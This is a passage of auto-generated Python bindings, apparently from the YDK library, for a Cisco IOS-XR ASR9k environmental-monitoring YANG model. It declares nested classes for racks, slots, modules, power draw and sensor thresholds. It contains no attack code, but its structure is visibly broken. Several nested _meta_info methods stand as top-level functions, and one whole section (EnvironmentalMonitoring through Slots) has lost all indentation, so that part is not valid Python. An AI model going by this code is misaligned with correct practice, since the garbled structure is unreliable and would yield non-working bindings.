                            **range:** 0..4294967295

                            **config**\: False

                            .. attribute:: threshold_value

                            Value of the configured threshold

                            **type**\: int

                            **range:** 0..4294967295

                            **config**\: False

                            .. attribute:: threshold_evaluation

                            Indicates the result of the most recent evaluation of the thresholD

                            **type**\: bool

                            **config**\: False

                            .. attribute:: threshold_notification_enabled

                            Indicates whether or not a notification should result, in case of threshold violation

                            **type**\: bool

                            **config**\: False
                            """

                            _prefix = 'asr9k-sc-envmon-oper'
                            _revision = '2017-01-19'

                            def __init__(self):
                                if sys.version_info > (3,):
                                    super().__init__()
                                else:
                                    super(EnvironmentalMonitoringCli.RackClis.RackCli.SlotClis.SlotCli.ModuleClis.ModuleCli.SensorTypeClis.SensorTypeCli.SensorNameClis.SensorNameCli.ThresholdClis.ThresholdCli.ValueDetailedCli, self).__init__()

                                self.yang_name = "value-detailed-cli"
                                self.yang_parent_name = "threshold-cli"
                                self.is_top_level_class = False
                                self.has_list_ancestor = True
                                self.ylist_key_names = []
                                self._child_classes = OrderedDict([])
                                self._leafs = OrderedDict([
                                    ('threshold_severity', (YLeaf(YType.uint32, 'threshold-severity'), ['int'])),
                                    ('threshold_relation', (YLeaf(YType.uint32, 'threshold-relation'), ['int'])),
                                    ('threshold_value', (YLeaf(YType.uint32, 'threshold-value'), ['int'])),
                                    ('threshold_evaluation', (YLeaf(YType.boolean, 'threshold-evaluation'), ['bool'])),
                                    ('threshold_notification_enabled', (YLeaf(YType.boolean, 'threshold-notification-enabled'), ['bool'])),
                                ])
                                self.threshold_severity = None
                                self.threshold_relation = None
                                self.threshold_value = None
                                self.threshold_evaluation = None
                                self.threshold_notification_enabled = None
                                self._segment_path = lambda: "value-detailed-cli"
                                self._is_frozen = True

                            def __setattr__(self, name, value):
                                self._perform_setattr(EnvironmentalMonitoringCli.RackClis.RackCli.SlotClis.SlotCli.ModuleClis.ModuleCli.SensorTypeClis.SensorTypeCli.SensorNameClis.SensorNameCli.ThresholdClis.ThresholdCli.ValueDetailedCli, ['threshold_severity', 'threshold_relation', 'threshold_value', 'threshold_evaluation', 'threshold_notification_enabled'], name, value)

                            @staticmethod
                            def _meta_info():
                                from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_asr9k_sc_envmon_oper as meta
                                return meta._meta_table['EnvironmentalMonitoringCli.RackClis.RackCli.SlotClis.SlotCli.ModuleClis.ModuleCli.SensorTypeClis.SensorTypeCli.SensorNameClis.SensorNameCli.ThresholdClis.ThresholdCli.ValueDetailedCli']['meta_info']

                        @staticmethod
                        def _meta_info():
                            from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_asr9k_sc_envmon_oper as meta
                            return meta._meta_table['EnvironmentalMonitoringCli.RackClis.RackCli.SlotClis.SlotCli.ModuleClis.ModuleCli.SensorTypeClis.SensorTypeCli.SensorNameClis.SensorNameCli.ThresholdClis.ThresholdCli']['meta_info']

                    @staticmethod
                    def _meta_info():
                        from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_asr9k_sc_envmon_oper as meta
                        return meta._meta_table['EnvironmentalMonitoringCli.RackClis.RackCli.SlotClis.SlotCli.ModuleClis.ModuleCli.SensorTypeClis.SensorTypeCli.SensorNameClis.SensorNameCli.ThresholdClis']['meta_info']

                @staticmethod
                def _meta_info():
                    from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_asr9k_sc_envmon_oper as meta
                    return meta._meta_table['EnvironmentalMonitoringCli.RackClis.RackCli.SlotClis.SlotCli.ModuleClis.ModuleCli.SensorTypeClis.SensorTypeCli.SensorNameClis.SensorNameCli']['meta_info']

            @staticmethod
            def _meta_info():
                from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_asr9k_sc_envmon_oper as meta
                return meta._meta_table['EnvironmentalMonitoringCli.RackClis.RackCli.SlotClis.SlotCli.ModuleClis.ModuleCli.SensorTypeClis.SensorTypeCli.SensorNameClis']['meta_info']

        @staticmethod
        def _meta_info():
            from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_asr9k_sc_envmon_oper as meta
            return meta._meta_table['EnvironmentalMonitoringCli.RackClis.RackCli.SlotClis.SlotCli.ModuleClis.ModuleCli.SensorTypeClis.SensorTypeCli']['meta_info']

    @staticmethod
    def _meta_info():
        from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_asr9k_sc_envmon_oper as meta
        return meta._meta_table['EnvironmentalMonitoringCli.RackClis.RackCli.SlotClis.SlotCli.ModuleClis.ModuleCli.SensorTypeClis']['meta_info']
class PowerCli(_Entity_):
    """
    Module Power Draw

    .. attribute:: power_bag_cli

    Detailed power bag information

    **type**\: :py:class:`PowerBagCli <ydk.models.cisco_ios_xr.Cisco_IOS_XR_asr9k_sc_envmon_oper.EnvironmentalMonitoringCli.RackClis.RackCli.SlotClis.SlotCli.ModuleClis.ModuleCli.PowerCli.PowerBagCli>`

    **config**\: False
    """

    # YANG module prefix and revision this binding was generated from.
    _prefix = 'asr9k-sc-envmon-oper'
    _revision = '2017-01-19'

    def __init__(self):
        # Python 2/3 compatible super() call on a deeply nested class.
        if sys.version_info > (3,):
            super().__init__()
        else:
            super(EnvironmentalMonitoringCli.RackClis.RackCli.SlotClis.SlotCli.ModuleClis.ModuleCli.PowerCli, self).__init__()

        self.yang_name = "power-cli"
        self.yang_parent_name = "module-cli"
        self.is_top_level_class = False
        self.has_list_ancestor = True
        self.ylist_key_names = []
        # Maps YANG child names to (python attribute name, binding class).
        self._child_classes = OrderedDict([("power-bag-cli", ("power_bag_cli", EnvironmentalMonitoringCli.RackClis.RackCli.SlotClis.SlotCli.ModuleClis.ModuleCli.PowerCli.PowerBagCli))])
        self._leafs = OrderedDict()

        # Child container: wired to self so path resolution walks upward.
        self.power_bag_cli = EnvironmentalMonitoringCli.RackClis.RackCli.SlotClis.SlotCli.ModuleClis.ModuleCli.PowerCli.PowerBagCli()
        self.power_bag_cli.parent = self
        self._children_name_map["power_bag_cli"] = "power-bag-cli"
        self._segment_path = lambda: "power-cli"
        # Must be set last: freezes attribute creation via __setattr__.
        self._is_frozen = True

    def __setattr__(self, name, value):
        self._perform_setattr(EnvironmentalMonitoringCli.RackClis.RackCli.SlotClis.SlotCli.ModuleClis.ModuleCli.PowerCli, [], name, value)


    class PowerBagCli(_Entity_):
        """
        Detailed power bag information

        .. attribute:: power_value

        Current Power Value of the Unit

        **type**\: int

        **range:** \-2147483648..2147483647

        **config**\: False

        .. attribute:: power_max_value

        Max Power Value of the Unit

        **type**\: int

        **range:** \-2147483648..2147483647

        **config**\: False

        .. attribute:: power_unit_multiplier

        Unit Multiplier of Power

        **type**\: int

        **range:** 0..4294967295

        **config**\: False

        .. attribute:: power_accuracy

        Accuracy of the Power Value

        **type**\: int

        **range:** 0..4294967295

        **config**\: False

        .. attribute:: power_measure_caliber

        Measure Caliber

        **type**\: int

        **range:** 0..4294967295

        **config**\: False

        .. attribute:: power_current_type

        Current Type of the Unit

        **type**\: int

        **range:** 0..4294967295

        **config**\: False

        .. attribute:: power_origin

        The Power Origin of the Unit

        **type**\: int

        **range:** 0..4294967295

        **config**\: False

        .. attribute:: power_admin_state

        Admin Status of the Unit

        **type**\: int

        **range:** 0..4294967295

        **config**\: False

        .. attribute:: power_oper_state

        Oper Status of the Unit

        **type**\: int

        **range:** 0..4294967295

        **config**\: False

        .. attribute:: power_state_enter_reason

        Enter Reason for the State

        **type**\: str

        **length:** 0..50

        **config**\: False
        """

        _prefix = 'asr9k-sc-envmon-oper'
        _revision = '2017-01-19'

        def __init__(self):
            if sys.version_info > (3,):
                super().__init__()
            else:
                super(EnvironmentalMonitoringCli.RackClis.RackCli.SlotClis.SlotCli.ModuleClis.ModuleCli.PowerCli.PowerBagCli, self).__init__()

            self.yang_name = "power-bag-cli"
            self.yang_parent_name = "power-cli"
            self.is_top_level_class = False
            self.has_list_ancestor = True
            self.ylist_key_names = []
            # Leaf-only container: no child classes.
            self._child_classes = OrderedDict([])
            self._leafs = OrderedDict([
                ('power_value', (YLeaf(YType.int32, 'power-value'), ['int'])),
                ('power_max_value', (YLeaf(YType.int32, 'power-max-value'), ['int'])),
                ('power_unit_multiplier', (YLeaf(YType.uint32, 'power-unit-multiplier'), ['int'])),
                ('power_accuracy', (YLeaf(YType.uint32, 'power-accuracy'), ['int'])),
                ('power_measure_caliber', (YLeaf(YType.uint32, 'power-measure-caliber'), ['int'])),
                ('power_current_type', (YLeaf(YType.uint32, 'power-current-type'), ['int'])),
                ('power_origin', (YLeaf(YType.uint32, 'power-origin'), ['int'])),
                ('power_admin_state', (YLeaf(YType.uint32, 'power-admin-state'), ['int'])),
                ('power_oper_state', (YLeaf(YType.uint32, 'power-oper-state'), ['int'])),
                ('power_state_enter_reason', (YLeaf(YType.str, 'power-state-enter-reason'), ['str'])),
            ])
            self.power_value = None
            self.power_max_value = None
            self.power_unit_multiplier = None
            self.power_accuracy = None
            self.power_measure_caliber = None
            self.power_current_type = None
            self.power_origin = None
            self.power_admin_state = None
            self.power_oper_state = None
            self.power_state_enter_reason = None
            self._segment_path = lambda: "power-bag-cli"
            self._is_frozen = True

        def __setattr__(self, name, value):
            self._perform_setattr(EnvironmentalMonitoringCli.RackClis.RackCli.SlotClis.SlotCli.ModuleClis.ModuleCli.PowerCli.PowerBagCli, ['power_value', 'power_max_value', 'power_unit_multiplier', 'power_accuracy', 'power_measure_caliber', 'power_current_type', 'power_origin', 'power_admin_state', 'power_oper_state', 'power_state_enter_reason'], name, value)

        @staticmethod
        def _meta_info():
            # Deferred import: the generated _meta table is large.
            from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_asr9k_sc_envmon_oper as meta
            return meta._meta_table['EnvironmentalMonitoringCli.RackClis.RackCli.SlotClis.SlotCli.ModuleClis.ModuleCli.PowerCli.PowerBagCli']['meta_info']

    @staticmethod
    def _meta_info():
        from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_asr9k_sc_envmon_oper as meta
        return meta._meta_table['EnvironmentalMonitoringCli.RackClis.RackCli.SlotClis.SlotCli.ModuleClis.ModuleCli.PowerCli']['meta_info']
@staticmethod
def _meta_info():
    """Return the generated meta-info record for ModuleCli."""
    from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_asr9k_sc_envmon_oper as meta
    entry = meta._meta_table['EnvironmentalMonitoringCli.RackClis.RackCli.SlotClis.SlotCli.ModuleClis.ModuleCli']
    return entry['meta_info']
@staticmethod
def _meta_info():
    """Return the generated meta-info record for ModuleClis."""
    from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_asr9k_sc_envmon_oper as meta
    entry = meta._meta_table['EnvironmentalMonitoringCli.RackClis.RackCli.SlotClis.SlotCli.ModuleClis']
    return entry['meta_info']
@staticmethod
def _meta_info():
    """Return the generated meta-info record for SlotCli."""
    from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_asr9k_sc_envmon_oper as meta
    entry = meta._meta_table['EnvironmentalMonitoringCli.RackClis.RackCli.SlotClis.SlotCli']
    return entry['meta_info']
@staticmethod
def _meta_info():
    """Return the generated meta-info record for SlotClis."""
    from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_asr9k_sc_envmon_oper as meta
    entry = meta._meta_table['EnvironmentalMonitoringCli.RackClis.RackCli.SlotClis']
    return entry['meta_info']
@staticmethod
def _meta_info():
    """Return the generated meta-info record for RackCli."""
    from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_asr9k_sc_envmon_oper as meta
    entry = meta._meta_table['EnvironmentalMonitoringCli.RackClis.RackCli']
    return entry['meta_info']
@staticmethod
def _meta_info():
    """Return the generated meta-info record for RackClis."""
    from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_asr9k_sc_envmon_oper as meta
    entry = meta._meta_table['EnvironmentalMonitoringCli.RackClis']
    return entry['meta_info']
def clone_ptr(self):
    """Create a fresh top-level EnvironmentalMonitoringCli entity, cache it
    on this instance as ``_top_entity`` and return it."""
    top = EnvironmentalMonitoringCli()
    self._top_entity = top
    return top
@staticmethod
def _meta_info():
    """Return the generated meta-info record for EnvironmentalMonitoringCli."""
    from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_asr9k_sc_envmon_oper as meta
    entry = meta._meta_table['EnvironmentalMonitoringCli']
    return entry['meta_info']
class EnvironmentalMonitoring(_Entity_):
"""
environmental monitoring
.. attribute:: racks
Table of racks
**type**\: :py:class:`Racks <ydk.models.cisco_ios_xr.Cisco_IOS_XR_asr9k_sc_envmon_oper.EnvironmentalMonitoring.Racks>`
**config**\: False
"""
_prefix = 'asr9k-sc-envmon-oper'
_revision = '2017-01-19'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(EnvironmentalMonitoring, self).__init__()
self._top_entity = None
self.yang_name = "environmental-monitoring"
self.yang_parent_name = "Cisco-IOS-XR-asr9k-sc-envmon-oper"
self.is_top_level_class = True
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([("racks", ("racks", EnvironmentalMonitoring.Racks))])
self._leafs = OrderedDict()
self.racks = EnvironmentalMonitoring.Racks()
self.racks.parent = self
self._children_name_map["racks"] = "racks"
self._segment_path = lambda: "Cisco-IOS-XR-asr9k-sc-envmon-oper:environmental-monitoring"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(EnvironmentalMonitoring, [], name, value)
class Racks(_Entity_):
"""
Table of racks
.. attribute:: rack
Number
**type**\: list of :py:class:`Rack <ydk.models.cisco_ios_xr.Cisco_IOS_XR_asr9k_sc_envmon_oper.EnvironmentalMonitoring.Racks.Rack>`
**config**\: False
"""
_prefix = 'asr9k-sc-envmon-oper'
_revision = '2017-01-19'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(EnvironmentalMonitoring.Racks, self).__init__()
self.yang_name = "racks"
self.yang_parent_name = "environmental-monitoring"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([("rack", ("rack", EnvironmentalMonitoring.Racks.Rack))])
self._leafs = OrderedDict()
self.rack = YList(self)
self._segment_path = lambda: "racks"
self._absolute_path = lambda: "Cisco-IOS-XR-asr9k-sc-envmon-oper:environmental-monitoring/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(EnvironmentalMonitoring.Racks, [], name, value)
class Rack(_Entity_):
"""
Number
.. attribute:: rack (key)
Rack number
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: slots
Table of slots
**type**\: :py:class:`Slots <ydk.models.cisco_ios_xr.Cisco_IOS_XR_asr9k_sc_envmon_oper.EnvironmentalMonitoring.Racks.Rack.Slots>`
**config**\: False
"""
_prefix = 'asr9k-sc-envmon-oper'
_revision = '2017-01-19'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(EnvironmentalMonitoring.Racks.Rack, self).__init__()
self.yang_name = "rack"
self.yang_parent_name = "racks"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = ['rack']
self._child_classes = OrderedDict([("slots", ("slots", EnvironmentalMonitoring.Racks.Rack.Slots))])
self._leafs = OrderedDict([
('rack', (YLeaf(YType.uint32, 'rack'), ['int'])),
])
self.rack = None
self.slots = EnvironmentalMonitoring.Racks.Rack.Slots()
self.slots.parent = self
self._children_name_map["slots"] = "slots"
self._segment_path = lambda: "rack" + "[rack='" + str(self.rack) + "']"
self._absolute_path = lambda: "Cisco-IOS-XR-asr9k-sc-envmon-oper:environmental-monitoring/racks/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(EnvironmentalMonitoring.Racks.Rack, ['rack'], name, value)
class Slots(_Entity_):
"""
Table of slots
.. attribute:: slot
Name
**type**\: list of :py:class:`Slot <ydk.models.cisco_ios_xr.Cisco_IOS_XR_asr9k_sc_envmon_oper.EnvironmentalMonitoring.Racks.Rack.Slots.Slot>`
**config**\: False
"""
_prefix = 'asr9k-sc-envmon-oper'
_revision = '2017-01-19'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(EnvironmentalMonitoring.Racks.Rack.Slots, self).__init__()
self.yang_name = "slots"
self.yang_parent_name = "rack"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([("slot", ("slot", EnvironmentalMonitoring.Racks.Rack.Slots.Slot))])
self._leafs = OrderedDict()
self.slot = YList(self)
self._segment_path = lambda: "slots"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(EnvironmentalMonitoring.Racks.Rack.Slots, [], name, value)
# Auto-generated YDK binding for the YANG list "slot" under
# Cisco-IOS-XR-asr9k-sc-envmon-oper:environmental-monitoring/racks/rack/slots.
#
# Pattern shared by every nested class below (one class per YANG
# container/list node):
#   * __init__ registers child classes (`_child_classes`) and leafs
#     (`_leafs`) with the YDK runtime, then freezes the instance
#     (`_is_frozen = True`) so __setattr__ can validate later writes;
#   * `_segment_path` builds this node's XPath segment, including the
#     list-key predicate (e.g. "[slot='...']") for YANG list entries;
#   * `_meta_info` lazily imports the generated meta table — the import is
#     deferred into the function body to avoid a circular import at
#     module-load time;
#   * the `sys.version_info > (3,)` branch keeps the generated code
#     runnable on both Python 2 and Python 3 (zero-arg super() is py3-only).
class Slot(_Entity_):
    """
    Name

    .. attribute:: slot  (key)

        Slot name
        **type**\: str
        **pattern:** [\\w\\\-\\.\:,\_@#%$\\+=\\\|;]+
        **config**\: False

    .. attribute:: modules

        Table of modules
        **type**\: :py:class:`Modules <ydk.models.cisco_ios_xr.Cisco_IOS_XR_asr9k_sc_envmon_oper.EnvironmentalMonitoring.Racks.Rack.Slots.Slot.Modules>`
        **config**\: False

    """

    _prefix = 'asr9k-sc-envmon-oper'
    _revision = '2017-01-19'

    def __init__(self):
        if sys.version_info > (3,):
            super().__init__()
        else:
            super(EnvironmentalMonitoring.Racks.Rack.Slots.Slot, self).__init__()

        self.yang_name = "slot"
        self.yang_parent_name = "slots"
        self.is_top_level_class = False
        self.has_list_ancestor = True
        self.ylist_key_names = ['slot']
        self._child_classes = OrderedDict([("modules", ("modules", EnvironmentalMonitoring.Racks.Rack.Slots.Slot.Modules))])
        self._leafs = OrderedDict([
            ('slot', (YLeaf(YType.str, 'slot'), ['str'])),
        ])
        self.slot = None

        self.modules = EnvironmentalMonitoring.Racks.Rack.Slots.Slot.Modules()
        self.modules.parent = self
        self._children_name_map["modules"] = "modules"
        # List entry: key predicate identifies this element among siblings.
        self._segment_path = lambda: "slot" + "[slot='" + str(self.slot) + "']"
        self._is_frozen = True

    def __setattr__(self, name, value):
        self._perform_setattr(EnvironmentalMonitoring.Racks.Rack.Slots.Slot, ['slot'], name, value)


    class Modules(_Entity_):
        """
        Table of modules

        .. attribute:: module

            Name
            **type**\: list of :py:class:`Module <ydk.models.cisco_ios_xr.Cisco_IOS_XR_asr9k_sc_envmon_oper.EnvironmentalMonitoring.Racks.Rack.Slots.Slot.Modules.Module>`
            **config**\: False

        """

        _prefix = 'asr9k-sc-envmon-oper'
        _revision = '2017-01-19'

        def __init__(self):
            if sys.version_info > (3,):
                super().__init__()
            else:
                super(EnvironmentalMonitoring.Racks.Rack.Slots.Slot.Modules, self).__init__()

            self.yang_name = "modules"
            self.yang_parent_name = "slot"
            self.is_top_level_class = False
            self.has_list_ancestor = True
            self.ylist_key_names = []
            self._child_classes = OrderedDict([("module", ("module", EnvironmentalMonitoring.Racks.Rack.Slots.Slot.Modules.Module))])
            self._leafs = OrderedDict()

            self.module = YList(self)
            self._segment_path = lambda: "modules"
            self._is_frozen = True

        def __setattr__(self, name, value):
            self._perform_setattr(EnvironmentalMonitoring.Racks.Rack.Slots.Slot.Modules, [], name, value)


        class Module(_Entity_):
            """
            Name

            .. attribute:: module  (key)

                Module name
                **type**\: str
                **pattern:** [\\w\\\-\\.\:,\_@#%$\\+=\\\|;]+
                **config**\: False

            .. attribute:: power

                Module Power Draw
                **type**\: :py:class:`Power <ydk.models.cisco_ios_xr.Cisco_IOS_XR_asr9k_sc_envmon_oper.EnvironmentalMonitoring.Racks.Rack.Slots.Slot.Modules.Module.Power>`
                **config**\: False

            .. attribute:: sensor_types

                Table of sensor types
                **type**\: :py:class:`SensorTypes <ydk.models.cisco_ios_xr.Cisco_IOS_XR_asr9k_sc_envmon_oper.EnvironmentalMonitoring.Racks.Rack.Slots.Slot.Modules.Module.SensorTypes>`
                **config**\: False

            """

            _prefix = 'asr9k-sc-envmon-oper'
            _revision = '2017-01-19'

            def __init__(self):
                if sys.version_info > (3,):
                    super().__init__()
                else:
                    super(EnvironmentalMonitoring.Racks.Rack.Slots.Slot.Modules.Module, self).__init__()

                self.yang_name = "module"
                self.yang_parent_name = "modules"
                self.is_top_level_class = False
                self.has_list_ancestor = True
                self.ylist_key_names = ['module']
                self._child_classes = OrderedDict([("power", ("power", EnvironmentalMonitoring.Racks.Rack.Slots.Slot.Modules.Module.Power)), ("sensor-types", ("sensor_types", EnvironmentalMonitoring.Racks.Rack.Slots.Slot.Modules.Module.SensorTypes))])
                self._leafs = OrderedDict([
                    ('module', (YLeaf(YType.str, 'module'), ['str'])),
                ])
                self.module = None

                self.power = EnvironmentalMonitoring.Racks.Rack.Slots.Slot.Modules.Module.Power()
                self.power.parent = self
                self._children_name_map["power"] = "power"

                self.sensor_types = EnvironmentalMonitoring.Racks.Rack.Slots.Slot.Modules.Module.SensorTypes()
                self.sensor_types.parent = self
                self._children_name_map["sensor_types"] = "sensor-types"
                self._segment_path = lambda: "module" + "[module='" + str(self.module) + "']"
                self._is_frozen = True

            def __setattr__(self, name, value):
                self._perform_setattr(EnvironmentalMonitoring.Racks.Rack.Slots.Slot.Modules.Module, ['module'], name, value)


            class Power(_Entity_):
                """
                Module Power Draw

                .. attribute:: power_bag

                    Detailed power bag information
                    **type**\: :py:class:`PowerBag <ydk.models.cisco_ios_xr.Cisco_IOS_XR_asr9k_sc_envmon_oper.EnvironmentalMonitoring.Racks.Rack.Slots.Slot.Modules.Module.Power.PowerBag>`
                    **config**\: False

                """

                _prefix = 'asr9k-sc-envmon-oper'
                _revision = '2017-01-19'

                def __init__(self):
                    if sys.version_info > (3,):
                        super().__init__()
                    else:
                        super(EnvironmentalMonitoring.Racks.Rack.Slots.Slot.Modules.Module.Power, self).__init__()

                    self.yang_name = "power"
                    self.yang_parent_name = "module"
                    self.is_top_level_class = False
                    self.has_list_ancestor = True
                    self.ylist_key_names = []
                    self._child_classes = OrderedDict([("power-bag", ("power_bag", EnvironmentalMonitoring.Racks.Rack.Slots.Slot.Modules.Module.Power.PowerBag))])
                    self._leafs = OrderedDict()

                    self.power_bag = EnvironmentalMonitoring.Racks.Rack.Slots.Slot.Modules.Module.Power.PowerBag()
                    self.power_bag.parent = self
                    self._children_name_map["power_bag"] = "power-bag"
                    self._segment_path = lambda: "power"
                    self._is_frozen = True

                def __setattr__(self, name, value):
                    self._perform_setattr(EnvironmentalMonitoring.Racks.Rack.Slots.Slot.Modules.Module.Power, [], name, value)


                class PowerBag(_Entity_):
                    """
                    Detailed power bag information

                    .. attribute:: power_value

                        Current Power Value of the Unit
                        **type**\: int
                        **range:** \-2147483648..2147483647
                        **config**\: False

                    .. attribute:: power_max_value

                        Max Power Value of the Unit
                        **type**\: int
                        **range:** \-2147483648..2147483647
                        **config**\: False

                    .. attribute:: power_unit_multiplier

                        Unit Multiplier of Power
                        **type**\: int
                        **range:** 0..4294967295
                        **config**\: False

                    .. attribute:: power_accuracy

                        Accuracy of the Power Value
                        **type**\: int
                        **range:** 0..4294967295
                        **config**\: False

                    .. attribute:: power_measure_caliber

                        Measure Caliber
                        **type**\: int
                        **range:** 0..4294967295
                        **config**\: False

                    .. attribute:: power_current_type

                        Current Type of the Unit
                        **type**\: int
                        **range:** 0..4294967295
                        **config**\: False

                    .. attribute:: power_origin

                        The Power Origin of the Unit
                        **type**\: int
                        **range:** 0..4294967295
                        **config**\: False

                    .. attribute:: power_admin_state

                        Admin Status of the Unit
                        **type**\: int
                        **range:** 0..4294967295
                        **config**\: False

                    .. attribute:: power_oper_state

                        Oper Status of the Unit
                        **type**\: int
                        **range:** 0..4294967295
                        **config**\: False

                    .. attribute:: power_state_enter_reason

                        Enter Reason for the State
                        **type**\: str
                        **length:** 0..50
                        **config**\: False

                    """

                    _prefix = 'asr9k-sc-envmon-oper'
                    _revision = '2017-01-19'

                    def __init__(self):
                        if sys.version_info > (3,):
                            super().__init__()
                        else:
                            super(EnvironmentalMonitoring.Racks.Rack.Slots.Slot.Modules.Module.Power.PowerBag, self).__init__()

                        self.yang_name = "power-bag"
                        self.yang_parent_name = "power"
                        self.is_top_level_class = False
                        self.has_list_ancestor = True
                        self.ylist_key_names = []
                        # Leaf-only node: no child containers.
                        self._child_classes = OrderedDict([])
                        self._leafs = OrderedDict([
                            ('power_value', (YLeaf(YType.int32, 'power-value'), ['int'])),
                            ('power_max_value', (YLeaf(YType.int32, 'power-max-value'), ['int'])),
                            ('power_unit_multiplier', (YLeaf(YType.uint32, 'power-unit-multiplier'), ['int'])),
                            ('power_accuracy', (YLeaf(YType.uint32, 'power-accuracy'), ['int'])),
                            ('power_measure_caliber', (YLeaf(YType.uint32, 'power-measure-caliber'), ['int'])),
                            ('power_current_type', (YLeaf(YType.uint32, 'power-current-type'), ['int'])),
                            ('power_origin', (YLeaf(YType.uint32, 'power-origin'), ['int'])),
                            ('power_admin_state', (YLeaf(YType.uint32, 'power-admin-state'), ['int'])),
                            ('power_oper_state', (YLeaf(YType.uint32, 'power-oper-state'), ['int'])),
                            ('power_state_enter_reason', (YLeaf(YType.str, 'power-state-enter-reason'), ['str'])),
                        ])
                        self.power_value = None
                        self.power_max_value = None
                        self.power_unit_multiplier = None
                        self.power_accuracy = None
                        self.power_measure_caliber = None
                        self.power_current_type = None
                        self.power_origin = None
                        self.power_admin_state = None
                        self.power_oper_state = None
                        self.power_state_enter_reason = None
                        self._segment_path = lambda: "power-bag"
                        self._is_frozen = True

                    def __setattr__(self, name, value):
                        self._perform_setattr(EnvironmentalMonitoring.Racks.Rack.Slots.Slot.Modules.Module.Power.PowerBag, ['power_value', 'power_max_value', 'power_unit_multiplier', 'power_accuracy', 'power_measure_caliber', 'power_current_type', 'power_origin', 'power_admin_state', 'power_oper_state', 'power_state_enter_reason'], name, value)

                    @staticmethod
                    def _meta_info():
                        from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_asr9k_sc_envmon_oper as meta
                        return meta._meta_table['EnvironmentalMonitoring.Racks.Rack.Slots.Slot.Modules.Module.Power.PowerBag']['meta_info']

                @staticmethod
                def _meta_info():
                    from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_asr9k_sc_envmon_oper as meta
                    return meta._meta_table['EnvironmentalMonitoring.Racks.Rack.Slots.Slot.Modules.Module.Power']['meta_info']


            class SensorTypes(_Entity_):
                """
                Table of sensor types

                .. attribute:: sensor_type

                    Type of sensor
                    **type**\: list of :py:class:`SensorType <ydk.models.cisco_ios_xr.Cisco_IOS_XR_asr9k_sc_envmon_oper.EnvironmentalMonitoring.Racks.Rack.Slots.Slot.Modules.Module.SensorTypes.SensorType>`
                    **config**\: False

                """

                _prefix = 'asr9k-sc-envmon-oper'
                _revision = '2017-01-19'

                def __init__(self):
                    if sys.version_info > (3,):
                        super().__init__()
                    else:
                        super(EnvironmentalMonitoring.Racks.Rack.Slots.Slot.Modules.Module.SensorTypes, self).__init__()

                    self.yang_name = "sensor-types"
                    self.yang_parent_name = "module"
                    self.is_top_level_class = False
                    self.has_list_ancestor = True
                    self.ylist_key_names = []
                    self._child_classes = OrderedDict([("sensor-type", ("sensor_type", EnvironmentalMonitoring.Racks.Rack.Slots.Slot.Modules.Module.SensorTypes.SensorType))])
                    self._leafs = OrderedDict()

                    self.sensor_type = YList(self)
                    self._segment_path = lambda: "sensor-types"
                    self._is_frozen = True

                def __setattr__(self, name, value):
                    self._perform_setattr(EnvironmentalMonitoring.Racks.Rack.Slots.Slot.Modules.Module.SensorTypes, [], name, value)


                class SensorType(_Entity_):
                    """
                    Type of sensor

                    .. attribute:: type  (key)

                        Sensor type
                        **type**\: str
                        **pattern:** [\\w\\\-\\.\:,\_@#%$\\+=\\\|;]+
                        **config**\: False

                    .. attribute:: sensor_names

                        Table of sensors
                        **type**\: :py:class:`SensorNames <ydk.models.cisco_ios_xr.Cisco_IOS_XR_asr9k_sc_envmon_oper.EnvironmentalMonitoring.Racks.Rack.Slots.Slot.Modules.Module.SensorTypes.SensorType.SensorNames>`
                        **config**\: False

                    """

                    _prefix = 'asr9k-sc-envmon-oper'
                    _revision = '2017-01-19'

                    def __init__(self):
                        if sys.version_info > (3,):
                            super().__init__()
                        else:
                            super(EnvironmentalMonitoring.Racks.Rack.Slots.Slot.Modules.Module.SensorTypes.SensorType, self).__init__()

                        self.yang_name = "sensor-type"
                        self.yang_parent_name = "sensor-types"
                        self.is_top_level_class = False
                        self.has_list_ancestor = True
                        self.ylist_key_names = ['type']
                        self._child_classes = OrderedDict([("sensor-names", ("sensor_names", EnvironmentalMonitoring.Racks.Rack.Slots.Slot.Modules.Module.SensorTypes.SensorType.SensorNames))])
                        self._leafs = OrderedDict([
                            ('type', (YLeaf(YType.str, 'type'), ['str'])),
                        ])
                        self.type = None

                        self.sensor_names = EnvironmentalMonitoring.Racks.Rack.Slots.Slot.Modules.Module.SensorTypes.SensorType.SensorNames()
                        self.sensor_names.parent = self
                        self._children_name_map["sensor_names"] = "sensor-names"
                        self._segment_path = lambda: "sensor-type" + "[type='" + str(self.type) + "']"
                        self._is_frozen = True

                    def __setattr__(self, name, value):
